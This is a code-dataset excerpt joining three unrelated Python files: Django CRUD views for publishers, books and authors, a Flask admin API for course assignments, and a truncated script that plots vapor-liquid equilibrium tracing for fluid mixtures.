delete_publisher(request):\n print(request.GET)\n print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Publisher.objects.get(id=del_id)\n # 删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/publisher_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑出版社\ndef edit_publisher(request):\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_publisher_id = request.POST.get(\"id\", None)\n new_publisher_name = request.POST.get(\"publisher_name\", None)\n # 更新\n # 根据id取到编辑的是哪用户\n edit_obj = models.Publisher.objects.get(id=edit_publisher_id)\n edit_obj.name = new_publisher_name\n edit_obj.save() # 把修改提交到数据库\n\n # 跳转\n return redirect(\"/publisher_list/\")\n\n\n # 从GET请求中获取到当前编辑的用户对象的id\n edit_publisher_id = request.GET.get(\"id\", None)\n if edit_publisher_id:\n # 查找到当前编辑的用户对象\n publisher_obj = models.Publisher.objects.get(id=edit_publisher_id)\n return render(request, \"edit_publisher.html\", {\"publisher\": publisher_obj})\n else:\n return HttpResponse(\"编辑的出版社不存在!\")\n\n\n# 书的视图\n\n# 查询函数(展示所有出版社)\ndef book_list(request):\n # ���数据库中查询所有出版社\n # 用ORM工具\n all_book = models.Book.objects.all() # 返回一个对象列表[Publisher Object, Publisher Object)\n # print(ret)\n # print(ret[0].id, ret[0].name)\n return render(request, \"book_list.html\", {\"all_book\": all_book})\n\n\n\n# 添加书籍\ndef add_book(request):\n # 取到所有出版社\n publisher_list = models.Publisher.objects.all()\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据 {\"book_title\": \"电子工业出版社\" , \"publisher_id\": id}\n new_book_title = request.POST.get(\"book_title\", None)\n new_publisher_id = request.POST.get(\"publisher\", None)\n if new_book_title:\n # 去数据库中创建一条新记录,自动提交\n models.Book.objects.create(title=new_book_title, publisher_id=new_publisher_id)\n # return HttpResponse(\"添加成功!\")\n # 添加成功后直接跳转到书籍列表页\n return redirect(\"/book_list/\") # 跳转路径\n else:\n error_msg = \"书名不能为空!\"\n\n return render(request, \"add_book.html\", {\"error\": error_msg, \"publisher_list\": publisher_list})\n\n\n# 删除书籍\ndef delete_book(request):\n # print(request.GET)\n # print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Book.objects.get(id=del_id)\n # 删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/book_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑书籍\ndef edit_book(request):\n # 取到所有出版社\n publisher_list = models.Publisher.objects.all()\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_id = request.POST.get(\"book_id\", None)\n print(edit_id)\n new_book_title = request.POST.get(\"book_title\", None)\n new_book_publisher_id = request.POST.get(\"publisher\", None)\n # 更新\n # 根据id取到编辑的是哪本书籍\n edit_book_obj = models.Book.objects.get(id=edit_id)\n edit_book_obj.title = new_book_title\n edit_book_obj.publisher_id = new_book_publisher_id # 当前书籍关联的出版社id值\n edit_book_obj.save() # 把修改提交到数据库\n\n # 跳转\n return redirect(\"/book_list/\")\n\n\n # 从GET请求中获取到当前编辑的用户对象的id\n edit_id = request.GET.get(\"id\", None)\n # print(edit_id)\n if edit_id:\n # 查找到当前编辑的用户对象\n edit_book_obj = models.Book.objects.get(id=edit_id)\n return render(request,\n \"edit_book.html\",\n {\"book\": edit_book_obj, \"publisher_list\": publisher_list}\n )\n else:\n return HttpResponse(\"编辑的书籍不存在!\")\n\n\n# 作者视图\n\n# 作者列表\ndef author_list(request):\n all_author = models.Author.objects.all().order_by(\"id\")\n # print(all_author[0].book.all()) # 当前所有作者的书籍\n return render(request, \"author_list.html\", {\"author_list\": all_author})\n\n\n# 增加作者\ndef add_author(request):\n # 获取所有是书籍\n all_book = models.Book.objects.all()\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据\n new_author_name = request.POST.get(\"author_name\", None)\n # post提交的数据是多个值时,用getlist,如多选的select或者checkbox\n books = request.POST.getlist(\"books\", None)\n # print(new_author_name, books)\n if new_author_name:\n # 去数据库中创建一条新记录,自动提交\n # 创建作者\n new_author_obj = models.Author.objects.create(name=new_author_name)\n # 把新作者和书籍建立对应关系\n new_author_obj.book.set(books)\n # return HttpResponse(\"添加成功!\")\n\n # 添加成功后直接跳转到书籍列表页\n return redirect(\"/author_list/\") # 跳转路径\n else:\n error_msg = \"作者不能为空!\"\n\n return render(request, \"add_author.html\", {\"all_book\": all_book, \"error\": error_msg})\n\n\n# 删除作者\ndef delete_author(request):\n # print(request.GET)\n # print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的��者id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Author.objects.get(id=del_id)\n # 删除\n # 1、去作者表把作者删除\n # 2、去作者和书籍的关联表,把对应关联记录删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/author_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑作者\ndef edit_author(request):\n # 取到所有书籍对象\n book_list = models.Book.objects.all()\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_author_id = request.POST.get(\"author_id\", None)\n # print(edit_id)\n new_author_name = request.POST.get(\"author_name\", None)\n # 拿到编辑后作者关联的书籍\n new_books = request.POST.getlist(\"books\", None)\n # 更新\n # 根据id取到当前编辑的作者\n edit_author_obj = models.Author.objects.get(id=edit_author_id)\n edit_author_obj.name = new_author_name\n edit_author_obj.book.set(new_books) # 当前作者关联是书\n edit_author_obj.save() # 把修改提交到数据库\n\n # 跳转\n return redirect(\"/author_list/\")\n\n\n # 从GET请求中获取到当前编辑的作者对象的id\n edit_id = request.GET.get(\"id\", None)\n # print(edit_id)\n if edit_id:\n # 查找到当前编辑的用户对象\n edit_author_obj = models.Author.objects.get(id=edit_id)\n return render(request,\n \"edit_author.html\",\n {\"author\": edit_author_obj, \"book_list\": book_list}\n )\n else:\n return HttpResponse(\"编辑的作者不存在!\")","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"162251072","text":"import json\nfrom datetime import datetime, timedelta\n\nimport parse\nfrom dateutil.parser import parse as dateparse\nfrom flask import Blueprint\nfrom sqlalchemy.exc import DataError, IntegrityError\n\nfrom anubis.models import (\n db,\n Assignment,\n AssignmentRepo,\n User,\n AssignmentTest,\n SubmissionTestResult,\n)\nfrom anubis.utils.auth.http import require_admin\nfrom anubis.utils.data import rand\nfrom anubis.utils.data import row2dict, req_assert\nfrom anubis.utils.http.decorators import load_from_id, json_response, json_endpoint\nfrom anubis.utils.http import error_response, success_response\nfrom anubis.lms.assignments import assignment_sync\nfrom anubis.lms.courses import course_context, assert_course_context\nfrom anubis.lms.questions import get_assigned_questions\nfrom anubis.utils.logging import logger\n\nassignments = Blueprint(\"admin-assignments\", __name__, url_prefix=\"/admin/assignments\")\n\n\n@assignments.route('/repos/')\n@require_admin()\n@load_from_id(Assignment, verify_owner=False)\n@json_response\ndef admin_assignments_repos_id(assignment: Assignment):\n \"\"\"\n\n :param assignment:\n :return:\n \"\"\"\n\n assert_course_context(assignment)\n\n repos = AssignmentRepo.query.filter(\n AssignmentRepo.assignment_id == assignment.id,\n ).all()\n\n def get_ssh_url(url):\n r = parse.parse('https://github.com/{}', url)\n path = r[0]\n path = path.removesuffix('.git')\n return f'git@github.com:{path}.git'\n\n return success_response({'assignment': assignment.full_data, 'repos': [\n {\n 'id': repo.id,\n 'url': repo.repo_url,\n 'ssh': get_ssh_url(repo.repo_url),\n 'github_username': repo.github_username,\n 'name': repo.owner.name if repo.owner_id is not None else 'N/A',\n 'netid': repo.owner.netid if repo.owner_id is not None else 'N/A',\n }\n for repo in repos\n ]})\n\n\n@assignments.route(\"/assignment//questions/get/\")\n@require_admin()\n@load_from_id(Assignment, verify_owner=False)\n@json_response\ndef private_assignment_id_questions_get_netid(assignment: Assignment, netid: str):\n \"\"\"\n Get questions assigned to a given student.\n\n :param assignment:\n :param netid:\n :return:\n \"\"\"\n user = User.query.filter_by(netid=netid).first()\n\n # Verify that the user exists, and that the assignment\n # is within the course context of the current user.\n req_assert(user is not None, message='user not found')\n assert_course_context(assignment)\n\n return success_response(\n {\n \"netid\": user.netid,\n \"questions\": get_assigned_questions(assignment.id, user.id),\n }\n )\n\n\n@assignments.route(\"/get/\")\n@require_admin()\n@load_from_id(Assignment, verify_owner=False)\n@json_response\ndef admin_assignments_get_id(assignment: Assignment):\n \"\"\"\n Get the full data for an assignment id. The course context\n must be set, and will be checked.\n\n :param assignment:\n :return:\n \"\"\"\n\n # Confirm that the assignment they are asking for is part\n # of this course\n assert_course_context(assignment)\n\n # Pass back the full data\n return success_response({\n \"assignment\": row2dict(assignment),\n \"tests\": [test.data for test in assignment.tests],\n })\n\n\n@assignments.route(\"/list\")\n@require_admin()\n@json_response\ndef admin_assignments_list():\n \"\"\"\n List all assignments within the course context.\n\n * The response will be the row2dict of the assignment, not a data prop *\n\n :return:\n \"\"\"\n\n # Get all the assignment objects within the course context,\n # sorted by the due date.\n all_assignments = Assignment.query.filter(\n Assignment.course_id == course_context.id\n ).order_by(Assignment.due_date.desc()).all()\n\n # Pass back the row2dict of each assignment object\n return success_response({\n \"assignments\": [row2dict(assignment) for assignment in all_assignments]\n })\n\n\n@assignments.route('/tests/toggle-hide/')\n@require_admin()\n@json_response\ndef admin_assignment_tests_toggle_hide_assignment_test_id(assignment_test_id: str):\n \"\"\"\n Toggle an assignment test being hidden.\n\n :param assignment_test_id:\n :return:\n \"\"\"\n\n # Pull the assignment test\n assignment_test: AssignmentTest = AssignmentTest.query.filter(\n AssignmentTest.id == assignment_test_id,\n ).first()\n\n # Make sure the assignment test exists\n req_assert(assignment_test is not None, message='test not found')\n\n # Verify that course the assignment test is apart of and\n # the course context match\n assert_course_context(assignment_test)\n\n # Toggle the hidden field\n assignment_test.hidden = not assignment_test.hidden\n\n # Commit the change\n db.session.commit()\n\n return success_response({\n 'status': 'test updated',\n 'assignment_test': assignment_test.data\n })\n\n\n@assignments.route('/tests/delete/')\n@require_admin()\n@json_response\ndef admin_assignment_tests_delete_assignment_test_id(assignment_test_id: str):\n \"\"\"\n Delete an assignment test.\n\n :param assignment_test_id:\n :return:\n \"\"\"\n\n # Pull the assignment test\n assignment_test = AssignmentTest.query.filter(\n AssignmentTest.id == assignment_test_id,\n ).first()\n\n # Make sure the assignment test exists\n req_assert(assignment_test is not None, message='test not found')\n\n # Verify that course the assignment test is apart of and\n # the course context match\n assert_course_context(assignment_test)\n\n # Save the test name so we can use it in the response\n test_name = assignment_test.name\n\n # Delete all the submission test results that are pointing to\n # this test\n SubmissionTestResult.query.filter(\n SubmissionTestResult.assignment_test_id == assignment_test.id,\n ).delete()\n\n # Delete the test itself\n AssignmentTest.query.filter(\n AssignmentTest.id == assignment_test_id,\n ).delete()\n\n # Commit the changes\n db.session.commit()\n\n # Pass back the status\n return success_response({\n 'status': f'{test_name} deleted',\n 'variant': 'warning',\n })\n\n\n@assignments.post('/add')\n@require_admin()\n@json_response\ndef admin_assignments_add():\n new_assignment = Assignment(\n course_id=course_context.id,\n name='New Assignment',\n description='',\n hidden=True,\n autograde_enabled=False,\n github_repo_required=course_context.github_repo_required,\n ide_enabled=True,\n theia_image=course_context.theia_default_image,\n theia_options=course_context.theia_default_options,\n release_date=datetime.now() + timedelta(weeks=1),\n due_date=datetime.now() + timedelta(weeks=2),\n grace_date=datetime.now() + timedelta(weeks=2),\n )\n db.session.add(new_assignment)\n db.session.commit()\n\n return success_response({\n 'status': 'New assignment created.',\n 'assignment': new_assignment.data,\n })\n\n\n@assignments.post(\"/save\")\n@require_admin()\n@json_endpoint(required_fields=[(\"assignment\", dict)])\ndef admin_assignments_save(assignment: dict):\n \"\"\"\n Save assignment from raw fields\n\n :param assignment:\n :return:\n \"\"\"\n logger.info(json.dumps(assignment, indent=2))\n\n # Get assignment\n assignment_id = assignment[\"id\"]\n db_assignment = Assignment.query.filter(Assignment.id == assignment_id).first()\n\n # Make sure it exists\n if db_assignment is None:\n # Create it if it doesn't exist\n db_assignment = Assignment()\n assignment[\"id\"] = rand()\n db.session.add(db_assignment)\n\n assert_course_context(db_assignment)\n\n # Update all it's fields\n for key, value in assignment.items():\n if 'date' in key and isinstance(value, str):\n value = dateparse(value.replace('T', ' ').replace('Z', ''))\n setattr(db_assignment, key, value)\n\n # Attempt to commit\n try:\n db.session.commit()\n except (IntegrityError, DataError) as e:\n # Tell frontend what error happened\n return error_response(str(e))\n\n # Return status\n return success_response(\n {\n \"status\": \"Assignment updated\",\n }\n )\n\n\n@assignments.route(\"/sync\", methods=[\"POST\"])\n@require_admin(unless_debug=True)\n@json_endpoint(required_fields=[(\"assignment\", dict)])\ndef private_assignment_sync(assignment: dict):\n \"\"\"\n Sync assignment data from the CLI. This should be used to create and update assignment data.\n\n body = {\n \"assignment\": {\n \"name\": \"{name}\",\n \"course\": \"CS-UY 3224\",\n \"hidden\": true,\n \"unique_code\": \"{code}\",\n \"pipeline_image\": \"registry.digitalocean.com/anubis/assignment/{code}\",\n \"date\": {\n \"release\": \"{now}\",\n \"due\": \"{week_from_now}\",\n \"grace\": \"{week_from_now}\"\n },\n \"description\": \"This is a very long description that encompasses the entire assignment\\n\",\n \"questions\": [\n {\n \"sequence\": 1,\n \"questions\": [\n {\n \"q\": \"What is 3*4?\",\n \"a\": \"12\"\n },\n {\n \"q\": \"What is 3*2\",\n \"a\": \"6\"\n }\n ]\n },\n {\n \"sequence\": 2,\n \"questions\": [\n {\n \"q\": \"What is sqrt(144)?\",\n \"a\": \"12\"\n }\n ]\n }\n ]\n }\n }\n\n response = {\n assignment : {}\n questions: {\n accepted: [ ... ]\n ignored: [ ... ]\n rejected: [ ... ]\n }\n }\n\n :return:\n \"\"\"\n\n # The course context assertion happens in the sync function\n\n # Create or update assignment\n message, success = assignment_sync(assignment)\n\n # If there was an error, pass it back\n req_assert(success, message=message, status_code=406)\n\n # Return\n return success_response(message)\n","sub_path":"api/anubis/views/admin/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":10047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"298978266","text":"from __future__ import print_function\n\n# Python imports\nimport os, json, timeit, math\n\n# Packages that can be installed via pip or conda\nimport pandas\nimport matplotlib.pyplot as plt, numpy as np\nimport matplotlib\nmpl = matplotlib\n# import plotly\n# import plotly.plotly as py\n# import plotly.graph_objs as go\n\n# The pybind11 wrapper module \nimport VLEIsoTracer as vle\nprint('VLEIsoTracer is located at:', vle.__file__)\n\nplt.style.use('classic')\nif os.path.exists('Elsevier_journals.mplstyle'):\n plt.style.use('Elsevier_journals.mplstyle')\n\nvle.AbstractState('HEOS', '&'.join(['CO2','Ethane']))\n \n# vle.apply_simple_mixing_rule('SO2','Water','linear')\n# vle.apply_simple_mixing_rule('Methane','n-Hexane','linear')\n\ndef lowTerror(polishing):\n \"\"\"\n Plot the error in chemical potential and pressure as we trace \n along an isotherm of the phase envelope\n \"\"\"\n\n R = 8.3144598\n T = 230\n fluids = ['n-Hexane','n-Octane']\n fig, (ax1,ax2) = plt.subplots(2,1,figsize=(3.5,4),sharex= True)\n backend = 'PR'\n\n for err, ms in [[1e-3,'^-'],[1e-9,'o-']]:\n data = None\n try:\n # Build the integrator class\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n # Set flags\n tracer.set_allowable_error(err)\n tracer.polishing(polishing)\n tracer.set_debug_polishing(True)\n # Do it!\n tic = timeit.default_timer()\n tracer.trace()\n toc = timeit.default_timer()\n data = tracer.get_tracer_data()\n\n lbl = r'$\\varepsilon_{\\rm allowed}$: ' + '$10^{{{0:0.0f}}}$'.format(np.log10(err))\n # Plot the data\n x = np.array(data.x).T[0]\n perr = np.abs((np.array(data.pL) - np.array(data.pV))/np.array(data.pL))*100\n rhoL0 = np.array(data.rhoL).T[0]; rhoV0 = np.array(data.rhoV).T[0]\n chempoterr = np.abs(np.array(data.chempotr0L) - np.array(data.chempotr0V) + R*T*np.log(rhoL0/rhoV0))\n chempoterr2 = np.abs(np.array(data.chempot0L) - np.array(data.chempot0V))\n ax1.plot(x[0:-1], perr[0:-1], ms, label = lbl)\n ax2.plot(x[0:-1], chempoterr[0:-1], ms, label = lbl)\n ax2.plot(x[0:-1], chempoterr2[0:-1], ms, label = lbl)\n\n except BaseException as BE:\n print(BE)\n \n # print(np.array(data.x).T[0])\n # print(np.abs((np.array(data.pL) - np.array(data.pV))/np.array(data.pL))*100)\n # print(np.abs((np.array(data.chempot0L) - np.array(data.chempot0V))/np.array(data.chempot0V))*100)\n\n print(err, len(data.pL), toc-tic)\n\n ax1.legend(loc='best')\n ax1.set_xlim(0, 1)\n ax1.set_yscale('log')\n ax2.set_yscale('log')\n ax2.set_xlabel(r'$x_{\\rm '+fluids[0]+'}$ (-)')\n ax1.set_ylabel(r'$|\\Delta p/p|\\times 100$ (%)')\n ax2.set_ylabel(r'$|\\Delta \\mu_1|$ (J/mol)')\n\n fig.tight_layout(pad=0.2)\n fig.savefig('_'.join(fluids)+'-polishing'+str(polishing)+'.pdf')\n plt.show()\n\ndef tocritline():\n \"\"\"\n Plot values (determinant of Hessian and others) along a high-temperature isotherm\n \"\"\"\n T = 300\n fluids = ['CO2','Ethane']\n\n fig, (ax1,ax2) = plt.subplots(2,1,figsize=(3.5,3.5),sharex = True)\n fig3, ax3 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n fig4, ax4 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n backend = 'HEOS'\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.trace()\n data = tracer.get_tracer_data()\n xval = np.array(data.rhoL).T[0]\n line, = ax1.plot(xval, np.abs(data.det_PSIL), label = 'liquid')\n ax1.plot(xval, np.abs(data.det_PSIV), dashes=[2,2], label='vapor')\n\n xval = np.array(data.rhoL).T[0][0:-1]\n yval = np.diff(np.array(data.rhoL).T[0])\n ax2.plot(xval, yval, 'r')\n\n rho1 = np.array(data.rhoL).T[0]\n ax3.plot(list(range(len(rho1))), rho1/np.max(rho1))\n\n ax4.plot(np.array(data.rhoL).T[0], np.array(data.rhoL).T[1])\n\n except BaseException as BE:\n print(BE)\n pass\n\n for ax in ax1,ax2:\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xticks([1e-6,1e-4,1e-2,1e0,1e2,1e4])\n ax1.legend(loc='best')\n\n ax1.set_ylabel(r'$\\det(\\mathbf{H}_{\\Psi})$')\n ax2.set_ylabel(r'$h$ (mol/m$^3$)')\n ax2.set_xlabel(r\"$\\rho_1'$ (mol/m$^3$)\")\n ax1.set_yticks([1e-2,1e0,1e2,1e4,1e6,1e8])\n ax2.set_yticks([1e-8, 1e-6,1e-4,1e-2,1e0,1e2])\n\n ax3.set_xlabel(r'Step index')\n ax3.set_ylabel(r\"$\\rho_1'/{\\rm max}(\\rho_1')$ (-)\")\n ax3.set_ylim(0, 1.01)\n\n fig.tight_layout(pad=0.2)\n fig.savefig('_'.join(fluids)+'-'+str(T)+'Ktocritline.pdf')\n\n fig3.tight_layout(pad=0.2)\n fig3.savefig('_'.join(fluids)+'-'+str(T)+'Ktocritline-progress.pdf')\n\n fig4.tight_layout(pad=0.2)\n fig4.savefig('_'.join(fluids)+'-'+str(T)+'Ktocritline-debug.pdf')\n\n plt.close('all')\n\ndef CO2ethaneconcentrations():\n T = 285\n fluids = ['CO2','Ethane']\n fig4, ax4 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n backend = 'HEOS'\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n # Set flags\n tracer.set_allowable_error(1e-6)\n # tracer.polishing(polishing)\n tracer.set_debug_polishing(True)\n tracer.set_forwards_integration(True)\n tracer.set_unstable_termination(False)\n # tracer.set_stepping_variable(vle.VLEIsolineTracer.stepping_variable.STEP_IN_RHO1)\n tracer.trace()\n data = tracer.get_tracer_data()\n x = np.array(data.x).T[0]\n rhoLmat = np.array(data.rhoL)\n rhoVmat = np.array(data.rhoV)\n ax4.plot(x, rhoLmat[:,0],color='b')\n ax4.plot(x, rhoLmat[:,1],color='r')\n ax4.plot(x, rhoVmat[:,0],dashes = [2,2], color='b')\n ax4.plot(x, rhoVmat[:,1],dashes = [2,2], color='r')\n print(tracer.get_termination_reason())\n\n except BaseException as BE:\n print(BE)\n pass\n\n ax4.set_xlabel(r'x / molar')\n ax4.set_ylabel(r\"$\\rho'$,$\\rho''$ / mol/m$^3$\")\n # ax4.set_ylim(0, 1.01)\n\n fig4.tight_layout(pad=0.2)\n fig4.savefig('_'.join(fluids)+'-'+str(T)+'conc.pdf')\n\n plt.close('all')\n\ndef MethaneEthane():\n fluids = ['Methane','Ethane']\n T = vle.Props1SI('Tcrit','Methane')-1\n fig1, ax1 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n fig4, ax4 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n backend = 'HEOS'\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n # Set flags\n tracer.set_allowable_error(1e-6)\n # tracer.polishing(polishing)\n tracer.set_debug_polishing(True)\n tracer.set_forwards_integration(True)\n tracer.set_unstable_termination(False)\n tracer.set_stepping_variable(vle.VLEIsolineTracer.stepping_variable.STEP_IN_RHO1)\n tracer.trace()\n data = tracer.get_tracer_data()\n x = np.array(data.x).T[0]\n y = np.array(data.y).T[0]\n pL = np.array(data.pL)/1e6\n rhoLmat = np.array(data.rhoL)\n rhoVmat = np.array(data.rhoV)\n ax4.plot(x, rhoLmat[:,0],color='b')\n ax4.plot(x, rhoLmat[:,1],color='r')\n ax4.plot(x, rhoVmat[:,0],dashes = [2,2], color='b')\n ax4.plot(x, rhoVmat[:,1],dashes = [2,2], color='r')\n print(tracer.get_termination_reason())\n ax1.plot(x, pL)\n ax1.plot(y, pL)\n\n except BaseException as BE:\n print(BE)\n pass\n\n ax1.set_xlabel(r'x / molar')\n ax1.set_ylabel(r\"$p$ / MPa\")\n ax4.set_xlabel(r'x / molar')\n ax4.set_ylabel(r\"$\\rho'$,$\\rho''$ / mol/m$^3$\")\n\n fig1.tight_layout(pad=0.2)\n fig1.savefig('_'.join(fluids)+'-'+str(T)+'px.pdf')\n fig4.tight_layout(pad=0.2)\n fig4.savefig('_'.join(fluids)+'-'+str(T)+'conc.pdf')\n\n plt.close('all')\n\ndef speedtest():\n \"\"\"\n Time some results from the isoline tracing, and compare with algebraic solver\n \"\"\"\n fluids = ['CO2','Ethane'] \n fig, (ax1) = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n\n lib = []\n for T in np.arange(260, 304):\n time_trace = np.nan; alg_fail = True; time_alg = np.nan\n print('--')\n for backend in ['HEOS']:\n for polishing in [False, True]:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_allowable_error(1e-4)\n tracer.polishing(polishing)\n try:\n tracer.trace()\n data = tracer.get_tracer_data()\n\n print(backend, T, polishing, len(data.pL), tracer.get_tracing_time(), tracer.get_termination_reason())\n\n if backend == 'HEOS' and polishing:\n time_trace = tracer.get_tracing_time()\n\n xx = np.array(data.x).T\n yy = np.array(data.y).T\n\n AS = vle.AbstractState('HEOS', 'CO2&Ethane')\n tic = timeit.default_timer()\n bad = 0\n for i in range(xx.shape[1]):\n AS.set_mole_fractions(xx[:,1])\n try:\n AS.update(vle.QT_INPUTS, 0, T)\n except:\n bad +=1\n toc = timeit.default_timer()\n print(T, 'FLSH-HEOS', toc-tic, len(data.pL), bad)\n\n # \"Trace\" with the algebraic solver\n rhoL = data.rhoL[0]; rhoV = data.rhoV[0]\n rhostart = data.rhoL[0][0]; rhoend = data.rhoL[-1][0]\n for el in rhoV: rhoL.append(el)\n alg_tracer = vle.AlgebraicIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n alg_tracer.logging = True\n try:\n tic = timeit.default_timer()\n alg_tracer.trace_rho0(rhoL, np.linspace(rhostart, rhoend, 100))\n toc = timeit.default_timer()\n alg_fail = False\n time_alg = toc-tic\n except BaseException as BE:\n pass\n print(T, 'ALG', toc-tic, len(alg_tracer.p))\n\n except BaseException as BE:\n print(BE)\n pass\n lib.append(dict(Temp=T, time_alg=time_alg, time_trace = time_trace, alg_fail = alg_fail))\n df = pandas.DataFrame(lib)\n plt.plot(df.Temp, df.time_trace, 'ko', ms = 5, label = 'Isochoric tracer')\n plt.plot(df.Temp, df.time_alg, 'b^', ms = 5, label = 'Algebraic tracer')\n for index, row in df.iterrows():\n if row.alg_fail:\n plt.plot(row.Temp, row.time_trace, 'rx', ms = 12, lw = 3)\n else:\n # plt.plot(row.T, row.time_trace, '')\n pass\n plt.yscale('log')\n plt.legend(loc='best', numpoints = 1)\n plt.gca().yaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())\n plt.xlabel('$T$ (K)')\n plt.ylabel('$t$ (s)')\n fig.tight_layout(pad=0.2)\n plt.savefig('speedtest.pdf')\n plt.close()\n\ndef lowTSO2Water():\n T = 400\n fluids = ['SO2','Water']\n fig, ax = plt.subplots(1,1,figsize=(3.5,2.2))\n lbls = {'PR':'Peng-Robinson','HEOS':'Multi-fluid'}\n lw = {'PR':0,'HEOS':0}\n\n for backend in ['HEOS']:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_forwards_integration(True)\n tracer.set_unstable_termination(False)\n tracer.set_stepping_variable(vle.VLEIsolineTracer.stepping_variable.STEP_IN_RHO1)\n if backend == 'HEOS':\n AS = tracer.get_AbstractState_pointer() \n for k,v in zip(['betaT','gammaT','betaV','gammaV'],[1.019562, 0.916311, 1.094032, 0.962547]):\n AS.set_binary_interaction_double(0,1,k,v)\n tracer.trace()\n reason = tracer.get_termination_reason()\n if reason: \n print(reason)\n data = tracer.get_tracer_data()\n\n # AS = tracer.get_AbstractState_pointer()\n # for x0 in np.arange(0.3, 0.6, 0.025):\n # AS.set_mole_fractions([x0,1-x0])\n # pts = AS.all_critical_points()\n # for pt in pts:\n # print(x0, pt.T, pt.p/1e6, pt.rhomolar)\n # plt.plot(x0, pt.p/1e6,'o')\n col = mpl.cm.jet\n cpmax = np.max(np.array(data.chempot0L))\n cpmin = np.min(np.array(data.chempot0L))\n\n # p-x plot\n stable_mask = np.array(data.det_PSIL).T > 0\n for mask, marker in zip([stable_mask, ~stable_mask],['o', '*']):\n chempot = np.array(data.chempot0L)[mask]\n color = (chempot-cpmin)/(cpmax-cpmin)\n # print(color)\n x = 1-np.array(data.x).T[0][mask]\n y = (np.array(data.pL)/1e6)[mask]\n c = chempot\n line = ax.scatter(x, y, label = lbls[backend], c = color, cmap = plt.cm.jet, edgecolor = 'w')\n ax.scatter(1-np.array(data.y).T[0][mask], (np.array(data.pL)/1e6)[mask], lw = lw[backend], c = color, cmap = plt.cm.jet, edgecolor = 'w')\n\n except BaseException as BE:\n print(BE)\n raise\n\n ax.set_xlim(0, 1)\n # ax.set_yscale('log')\n ax.legend(loc='best')\n ax.set_xlabel(r'$x_{\\rm CO_{2}}$ (-)')\n ax.set_ylabel('$p$ (MPa)')\n\n fig.tight_layout(pad=0.2)\n fig.savefig('_'.join(fluids)+'-'+str(T)+'K.pdf')\n plt.show()\n\ndef calc_crits(backend, fluids, force = False):\n fname = backend + '-'.join(fluids)\n if not os.path.exists(fname) or force:\n print('rebuilding critical line')\n x, pc, Tc = [], [], []\n for x0 in np.linspace(1e-5, 1-1e-5, 101):\n AS = vle.AbstractState(backend, '&'.join(fluids))\n AS.set_mole_fractions([x0, 1-x0])\n try:\n pts = AS.all_critical_points()\n if len(pts) > 0:\n Tc.append(pts[0].T)\n pc.append(pts[0].p)\n x.append(x0)\n except BaseException as BE:\n print(x0, BE)\n with open(fname,'w') as fp:\n fp.write(json.dumps(dict(x = x, Tc = Tc, pc = pc, fluids = fluids, backend = backend)))\n with open(fname,'r') as fp:\n return json.load(fp)\n\ndef plot_isolines(fluids, Tvec, pvec, backend = 'HEOS', only_px = False):\n\n print(fluids)\n if only_px:\n fig, ax1 = plt.subplots(1,1,figsize=(3.5,2.5))\n else:\n fig, (ax1,ax2) = plt.subplots(1,2,figsize=(6.5,2.5))\n fig2, ax3 = plt.subplots(1,1)\n\n for T in Tvec:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_allowable_error(1e-8)\n tracer.polishing(True)\n 